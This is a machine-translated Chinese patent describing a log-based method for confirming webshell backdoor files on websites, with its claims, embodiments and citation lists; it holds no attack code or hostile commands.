According to embodiments of the present invention, a kind of checking device for being used to implement above-mentioned website backdoor file, such as Fig. 3 are additionally provided Shown, the device includes:Acquisition module 10, for obtaining network access log recording;Analysis module 20, for according to access net The communication protocol that backdoor file of standing is used is analyzed network access log recording, and choosing internet access to be verified please Seek record;Module 30 is chosen, is verified for being chosen according to the belonged to request type of internet access request record to be verified Mode;Authentication module 40, verifies that the text of record access is asked in internet access to be verified for the verification mode by selection Whether part is website backdoor file.
Alternatively, Fig. 4 is the structured flowchart of the checking device of website backdoor file according to the preferred embodiment of the invention.Such as Shown in Fig. 4, analysis module 20 can include:Resolution unit 200, for using communication protocol to being wrapped in network access log recording The whole internet access request record contained carries out piecewise analytic one by one;First determining unit 202, for by the request after parsing Include the interconnection of the code segment performed by website backdoor file and/or the fixed field set in communication protocol in body matter Net access request record is defined as internet access request record to be verified.
Alternatively, as shown in figure 4, choosing module 30 can include:First extraction unit 300, for be verified mutual URL is extracted in the request row of internet interview request record;Second determining unit 302, for the suffix portion included according to URL Content determines request type;Unit 304 is chosen, for being chosen according to request type for internet access request record to be verified Verification mode.
Alternatively, as shown in figure 4, authentication module 40 can include:Second extraction unit 400, for be verified mutual Extracted in internet interview request record and access connection password used in respective file;Searching unit 402, in request type In the case of for PHP types or ASP types, searched from internet access request record to be verified corresponding with connection password Executable code section;Generation unit 404, for running executable code section, generation fortune according to default calculation Calculate result;3rd determining unit 406, for when operation result is consistent with default result, determining that internet to be verified is visited The file for asking request record access is website backdoor file.
Alternatively, authentication module 40 can include:Second extraction unit 400, for being asked from internet access to be verified Ask to extract in record and access connection password used in respective file;Searching unit 402, for being JSP types in request type In the case of, search executable code section corresponding with connection password from internet access request record to be verified; Generation unit 404, for running executable code section according to specified command function, generation shows result;3rd determines Unit 406, for when showing that result meets the functional characteristic of command function, determining internet access request record to be verified The file of access is website backdoor file.
Embodiment 3
Embodiments of the invention can provide a kind of terminal, the terminal can be terminal group in Any one computer terminal.Alternatively, in the present embodiment, above computer terminal can also replace with mobile whole The terminal devices such as end.
Alternatively, in the present embodiment, above computer terminal can be located in multiple network equipments of computer network At least one network equipment.
Alternatively, Fig. 5 is a kind of structured flowchart of terminal according to embodiments of the present invention.As shown in figure 5, the meter Calculation machine terminal can include:One or more (one is only shown in figure) processors and memory.
Wherein, the website backdoor file that memory can be used in storage software program and module, such as embodiment of the present invention Verification method and the corresponding programmed instruction/module of device, processor by operation be stored in the software program in memory with And module, so as to perform various function application and data processing, that is, realize the verification method of above-mentioned website backdoor file.Deposit Reservoir may include high speed random access memory, can also include nonvolatile memory, such as one or more magnetic storage device, Flash memory or other non-volatile solid state memories.In some instances, memory can further comprise remote relative to processor The memory that journey is set, these remote memories can pass through network connection to terminal.The example of above-mentioned network includes but not limited In internet, intranet, LAN, mobile radio communication and combinations thereof.
Processor can call the information and application program of memory storage by transmitting device, to perform following step:
S1:Obtain network access log recording;
S2:The communication protocol used according to access website backdoor file is analyzed network access log recording, is selected Internet access to be verified is taken to ask record;
S3:Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;
S4:Verify that internet access to be verified asks whether the file of record access is net by the verification mode of selection Stand backdoor file.
Optionally, above-mentioned processor can also carry out the program code of following steps:Using communication protocol to network access The whole internet access request record included in log recording carries out piecewise analytic one by one;By the request body content after parsing In include the internet access of the code segment performed by website backdoor file and/or the fixed field set in communication protocol please Record is asked to be defined as internet access request record to be verified.
Optionally, above-mentioned processor can also carry out the program code of following steps:Please from internet access to be verified Ask and URL (URL) is extracted in the request row of record;The suffix portion content included according to URL determines request class Type;According to request type verification mode is chosen for internet access request record to be verified.
Optionally, above-mentioned processor can also carry out the program code of following steps:Please from internet access to be verified Ask to extract in record and access connection password used in respective file;In the situation that request type is PHP types or ASP types Under, search executable code section corresponding with connection password from internet access request record to be verified;According to pre- If the executable code section of calculation operation, generates operation result;When operation result is consistent with default result, it is determined that The file of internet access request record access to be verified is website backdoor file.
Optionally, above-mentioned processor can also carry out the program code of following steps:Please from internet access to be verified Ask to extract in record and access connection password used in respective file;In the case where request type is JSP types, to be verified Internet access request record in search with connecting the corresponding executable code section of password;According to specified command function The executable code section of operation, generation shows result;When showing that result meets the functional characteristic of command function, determine to be tested The file of the internet access request record access of card is website backdoor file.
Using the embodiment of the present invention, there is provided a kind of proof scheme of website backdoor file.After according to access website Door file using communication protocol the network access log recording retained on server is analyzed by the way of choose to be tested The internet access request record of card, and chosen according to the belonged to request type of internet access request record to be verified Verification mode confirm network backdoor file whether necessary being, so as to be effectively improved what website backdoor file was identified Success rate, significantly reduces the probability to failing to report or reporting by mistake in website backdoor file progress verification process, and then solve Mode accuracy that website backdoor file is determined by way of characteristic matching employed in correlation technique is relatively low, is also easy to produce The technical problem failed to report or reported by mistake.
It will appreciated by the skilled person that the structure shown in Fig. 5 is only signal, terminal can also be intelligence Can mobile phone (such as Android phone, iOS mobile phones), tablet personal computer, applause computer and mobile internet device (Mobile Internet Devices, MID), the terminal device such as PAD.Fig. 5 it does not cause to limit to the structure of above-mentioned electronic installation.Example Such as, terminal may also include the component (such as network interface, display device) more or less than shown in Fig. 5, or Person has the configuration different from shown in Fig. 5.
One of ordinary skill in the art will appreciate that all or part of step in the various methods of above-described embodiment is can To be completed by program come the device-dependent hardware of command terminal, the program can be stored in a computer-readable recording medium In, storage medium can include:Flash disk, read-only storage (Read-Only Memory, ROM), random access device (Random Access Memory, RAM), disk or CD etc..
Embodiment 4
Embodiments of the invention additionally provide a kind of storage medium.Alternatively, in the present embodiment, above-mentioned storage medium can For preserving the program code performed by the verification method for the website backdoor file that above-described embodiment one is provided.
Alternatively, in the present embodiment, above-mentioned storage medium can be located in computer network Computer terminal group In any one terminal, or in any one mobile terminal in mobile terminal group.
Alternatively, in the present embodiment, storage medium is arranged to the program code that storage is used to perform following steps:
S1:Obtain network access log recording;
S2:The communication protocol used according to access website backdoor file is analyzed network access log recording, is selected Internet access to be verified is taken to ask record;
S3:Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;
S4:Determine that internet access to be verified asks whether the file of record access is net by the verification mode of selection Stand backdoor file.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps: Piecewise analytic is carried out using communication protocol one by one to the whole internet access request record included in network access log recording; It in request body content after parsing will include the code segment performed by website backdoor file and/or set in communication protocol The internet access request record of fixed field is defined as internet access request record to be verified.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps: URL (URL) is extracted from the request row of internet access request record to be verified;Included according to URL Suffix portion content determines request type;According to request type authentication is chosen for internet access request record to be verified Formula.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps: Extract to access from internet access request record to be verified and connect password used in respective file;It is in request type In the case of PHP types or ASP types, being searched from internet access request record to be verified can with connecting that password is corresponding The code section of execution;Executable code section is run according to default calculation, operation result is generated;When operation result with When default result is consistent, the file for determining internet access request record access to be verified is website backdoor file.
Alternatively, in the present embodiment, storage medium is also configured to the program code that storage is used to perform following steps: Extract to access from internet access request record to be verified and connect password used in respective file;It is in request type In the case of JSP types, executable generation corresponding with connection password is searched from internet access request record to be verified Code part;According to the executable code section of specified command function operation, generation shows result;When display result meets function During the functional characteristic of order, the file for determining internet access request record access to be verified is website backdoor file.
The embodiments of the present invention are for illustration only, and the quality of embodiment is not represented.
In the above embodiment of the present invention, the description to each embodiment all emphasizes particularly on different fields, and does not have in some embodiment The part of detailed description, may refer to the associated description of other embodiment.
In several embodiments provided herein, it should be understood that disclosed technology contents, others can be passed through Mode is realized.Wherein, device embodiment described above is only schematical, such as division of described unit, is only A kind of division of logic function, can there is other dividing mode when actually realizing, such as multiple units or component can combine or Person is desirably integrated into another system, or some features can be ignored, or does not perform.Another, shown or discussed is mutual Between coupling or direct-coupling or communication connection can be the INDIRECT COUPLING or communication link of unit or module by some interfaces Connect, can be electrical or other forms.
The unit illustrated as separating component can be or may not be it is physically separate, it is aobvious as unit The part shown can be or may not be physical location, you can with positioned at a place, or can also be distributed to multiple On NE.Some or all of unit therein can be selected to realize the mesh of this embodiment scheme according to the actual needs 's.
In addition, each functional unit in each embodiment of the invention can be integrated in a processing unit, can also That unit is individually physically present, can also two or more units it is integrated in a unit.Above-mentioned integrated list Member can both be realized in the form of hardware, it would however also be possible to employ the form of SFU software functional unit is realized.
If the integrated unit is realized using in the form of SFU software functional unit and as independent production marketing or used When, it can be stored in a computer read/write memory medium.Understood based on such, technical scheme is substantially The part contributed in other words to prior art or all or part of the technical scheme can be in the form of software products Embody, the computer software product is stored in a storage medium, including some instructions are to cause a computer Equipment (can for personal computer, server or network equipment etc.) perform each embodiment methods described of the invention whole or Part steps.And foregoing storage medium includes:USB flash disk, read-only storage (ROM, Read-Only Memory), arbitrary access are deposited Reservoir (RAM, Random Access Memory), mobile hard disk, magnetic disc or CD etc. are various can be with store program codes Medium.
Described above is only the preferred embodiment of the present invention, it is noted that for the ordinary skill people of the art For member, under the premise without departing from the principles of the invention, some improvements and modifications can also be made, these improvements and modifications also should It is considered as protection scope of the present invention.

Claims (10)

1. a kind of verification method of website backdoor file, it is characterised in that including:
Obtain network access log recording;
The communication protocol used according to access website backdoor file is analyzed the network access log recording, and selection is treated The internet access request record of checking;
Verification mode is chosen according to the request type that the internet access request record to be verified is belonged to;
By the verification mode of selection verify the internet access to be verified ask record access file whether be The website backdoor file.
2. according to the method described in claim 1, it is characterised in that according to accessing described in the website backdoor file used Communication protocol is analyzed the network access log recording, chooses the internet access request record bag to be verified Include:
The whole internet access request included in the network access log recording is recorded one by one using the communication protocol Carry out piecewise analytic;
The code segment performed by the website backdoor file and/or the communication will be included in request body content after parsing The internet access request record of the fixed field set in agreement is defined as the internet access request record to be verified.
3. according to the method described in claim 1, it is characterised in that according to the internet access request record institute to be verified The request type of ownership, which chooses verification mode, to be included:
Uniform resource position mark URL is extracted from the request row of the internet access request record to be verified;
The suffix portion content included according to the URL determines the request type;
According to the request type verification mode is chosen for the internet access request record to be verified.
4. the method according to claim 1 or 3, it is characterised in that verify described to be verified by the verification mode Whether the file of internet access request record access is that the website backdoor file includes:
Extract to access from the internet access request record to be verified and connect password used in respective file;
In the case where the request type is PHP types or ASP types, record is asked from the internet access to be verified Middle lookup executable code section corresponding with the connection password;
The executable code section is run according to default calculation, operation result is generated;
When the operation result is consistent with default result, the internet access request record access to be verified is determined File is the website backdoor file.
5. the method according to claim 1 or 3, it is characterised in that verify described to be verified by the verification mode Whether the file of internet access request record access is that the website backdoor file includes:
Extract to access from the internet access request record to be verified and connect password used in respective file;
In the case where the request type is JSP types, searched from the internet access request record to be verified with It is described to connect the corresponding executable code section of password;
The executable code section is run according to specified command function, generation shows result;
When the display result meets the functional characteristic of the command function, the internet access request to be verified is determined The file of record access is the website backdoor file.
6. a kind of checking device of website backdoor file, it is characterised in that including:
Acquisition module, for obtaining network access log recording;
Analysis module, the communication protocol for being used according to access website backdoor file is entered to the network access log recording Row analysis, chooses internet access request record to be verified;
Module is chosen, for choosing authentication according to the belonged to request type of the internet access request record to be verified Formula;
Authentication module, verifies that record access is asked in the internet access to be verified for the verification mode by selection File whether be the website backdoor file.
7. device according to claim 6, it is characterised in that the analysis module includes:
Resolution unit, for whole internet access using the communication protocol to being included in the network access log recording Request record carries out piecewise analytic one by one;
First determining unit, for the generation performed by the website backdoor file will to be included in the request body content after parsing The internet access request record of the fixed field set in code section and/or the communication protocol is defined as described to be verified mutual Internet interview request record.
8. device according to claim 6, it is characterised in that the selection module includes:
First extraction unit, determines for extracting unified resource from the request row of the internet access request record to be verified Position symbol URL;
Second determining unit, the suffix portion content for being included according to the URL determines the request type;
Unit is chosen, for choosing authentication according to the request type for the internet access request record to be verified Formula.
9. the device according to claim 6 or 8, it is characterised in that the authentication module includes:
Second extraction unit, is used for extracting access respective file from the internet access request record to be verified Connection password;
Searching unit, in the case of being PHP types or ASP types in the request type, from the interconnection to be verified Executable code section corresponding with the connection password is searched in net access request record;
Generation unit, for running the executable code section according to default calculation, generates operation result;
3rd determining unit, for when the operation result is consistent with default result, determining the internet to be verified The file of access request record access is the website backdoor file.
10. the device according to claim 6 or 8, it is characterised in that the authentication module includes:
Second extraction unit, is used for extracting access respective file from the internet access request record to be verified Connection password;
Searching unit, in the case of being JSP types in the request type, from the internet access request to be verified Executable code section corresponding with the connection password is searched in record;
Generation unit, for running the executable code section according to specified command function, generation shows result;
3rd determining unit, for when the display result meets the functional characteristic of the command function, determining described to be tested The file of the internet access request record access of card is the website backdoor file.
CN201610096648.2A 2016-02-22 2016-02-22 Verification method and device for website backdoor file Active CN107104924B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201610096648.2A CN107104924B (en) 2016-02-22 2016-02-22 Verification method and device for website backdoor file

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201610096648.2A CN107104924B (en) 2016-02-22 2016-02-22 Verification method and device for website backdoor file

Publications (2)

Publication Number Publication Date
CN107104924A true CN107104924A (en) 2017-08-29
CN107104924B CN107104924B (en) 2020-10-09

Family

ID=59658691

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201610096648.2A Active CN107104924B (en) 2016-02-22 2016-02-22 Verification method and device for website backdoor file

Country Status (1)

Country Link
CN (1) CN107104924B (en)

Cited By (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107911355A (en) * 2017-11-07 2018-04-13 杭州安恒信息技术有限公司 A kind of website back door based on attack chain utilizes event recognition method
CN109040071A (en) * 2018-08-06 2018-12-18 杭州安恒信息技术股份有限公司 A kind of confirmation method of WEB backdoor attack event
CN110868410A (en) * 2019-11-11 2020-03-06 恒安嘉新(北京)科技股份公司 Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium
CN112073418A (en) * 2020-09-10 2020-12-11 北京微步在线科技有限公司 Encrypted flow detection method and device and computer readable storage medium
CN112182561A (en) * 2020-09-24 2021-01-05 百度在线网络技术(北京)有限公司 Method and device for detecting rear door, electronic equipment and medium
CN113225357A (en) * 2021-07-08 2021-08-06 北京搜狐新媒体信息技术有限公司 Evidence obtaining method and related device for webpage backdoor
CN113722639A (en) * 2021-08-25 2021-11-30 北京奇艺世纪科技有限公司 Website access verification method and device, electronic equipment and readable storage medium
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20120005743A1 (en) * 2010-06-30 2012-01-05 Mitsubishi Electric Corporation Internal network management system, internal network management method, and program
CN102426634A (en) * 2011-10-26 2012-04-25 中国信息安全测评中心 Method for finding back door of source code
US20150256551A1 (en) * 2012-10-05 2015-09-10 Myoung Hun Kang Log analysis system and log analysis method for security system
CN105069355A (en) * 2015-08-26 2015-11-18 厦门市美亚柏科信息股份有限公司 Static detection method and apparatus for webshell deformation
CN105302707A (en) * 2014-06-06 2016-02-03 腾讯科技(深圳)有限公司 Application vulnerability detection method and apparatus

Patent Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20120005743A1 (en) * 2010-06-30 2012-01-05 Mitsubishi Electric Corporation Internal network management system, internal network management method, and program
CN102426634A (en) * 2011-10-26 2012-04-25 中国信息安全测评中心 Method for finding back door of source code
US20150256551A1 (en) * 2012-10-05 2015-09-10 Myoung Hun Kang Log analysis system and log analysis method for security system
CN105302707A (en) * 2014-06-06 2016-02-03 腾讯科技(深圳)有限公司 Application vulnerability detection method and apparatus
CN105069355A (en) * 2015-08-26 2015-11-18 厦门市美亚柏科信息股份有限公司 Static detection method and apparatus for webshell deformation

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
石刘洋: "基于web日志的webshell检测方法研究", 《信息安全研究》 *

Cited By (14)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107911355B (en) * 2017-11-07 2020-05-01 杭州安恒信息技术股份有限公司 Website backdoor utilization event identification method based on attack chain
CN107911355A (en) * 2017-11-07 2018-04-13 杭州安恒信息技术有限公司 A kind of website back door based on attack chain utilizes event recognition method
CN109040071B (en) * 2018-08-06 2021-02-09 杭州安恒信息技术股份有限公司 Method for confirming WEB backdoor attack event
CN109040071A (en) * 2018-08-06 2018-12-18 杭州安恒信息技术股份有限公司 A kind of confirmation method of WEB backdoor attack event
CN110868410A (en) * 2019-11-11 2020-03-06 恒安嘉新(北京)科技股份公司 Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium
CN110868410B (en) * 2019-11-11 2022-05-10 恒安嘉新(北京)科技股份公司 Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium
CN112073418A (en) * 2020-09-10 2020-12-11 北京微步在线科技有限公司 Encrypted flow detection method and device and computer readable storage medium
CN112073418B (en) * 2020-09-10 2022-01-14 北京微步在线科技有限公司 Encrypted flow detection method and device and computer readable storage medium
CN112182561A (en) * 2020-09-24 2021-01-05 百度在线网络技术(北京)有限公司 Method and device for detecting rear door, electronic equipment and medium
CN112182561B (en) * 2020-09-24 2024-04-30 百度在线网络技术(北京)有限公司 Rear door detection method and device, electronic equipment and medium
CN113225357A (en) * 2021-07-08 2021-08-06 北京搜狐新媒体信息技术有限公司 Evidence obtaining method and related device for webpage backdoor
CN113722639A (en) * 2021-08-25 2021-11-30 北京奇艺世纪科技有限公司 Website access verification method and device, electronic equipment and readable storage medium
CN113722639B (en) * 2021-08-25 2023-08-25 北京奇艺世纪科技有限公司 Website access verification method, device, electronic equipment and readable storage medium

Also Published As

Publication number Publication date
CN107104924B (en) 2020-10-09

Similar Documents

Publication Publication Date Title
CN107104924A (en) The verification method and device of website backdoor file
CN103607385B (en) Method and apparatus for security detection based on browser
CN103944890B (en) Virtual interaction system based on customer end/server mode and method
CN104468592B (en) Login method and login system
US9264435B2 (en) Apparatus and methods for access solutions to wireless and wired networks
US7293281B1 (en) Method and system for verifying a client request
CN104519050B (en) Login method and login system
CN107016074B (en) Webpage loading method and device
CN102591889A (en) Method and device for assisting user input based on browser of mobile terminal
CN106453216A (en) Malicious website interception method, malicious website interception device and client
CN105939326A (en) Message processing method and device
CN105553999B (en) Application user behavioural analysis and method of controlling security and its corresponding device
CN108696490A (en) The recognition methods of account permission and device
CN106453266A (en) Abnormal networking request detection method and apparatus
CN105302707B (en) The leak detection method and device of application program
CN108810896A (en) The connection authentication method and device of wireless access point
CN105306414A (en) Port vulnerability detection method, device and system
CN103444215A (en) Methods and apparatuses for avoiding damage in network attacks
CN103647652B (en) A kind of method for realizing data transfer, device and server
Kaur et al. Browser fingerprinting as user tracking technology
CN108259457A (en) A kind of WEB authentication methods and device
CN103634111B (en) Single-point logging method and system and single sign-on client-side
CN107332804A (en) The detection method and device of webpage leak
CN105554136B (en) Backup Data restoring method, apparatus and system
CN108924159A (en) The verification method and device in a kind of message characteristic identification library

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant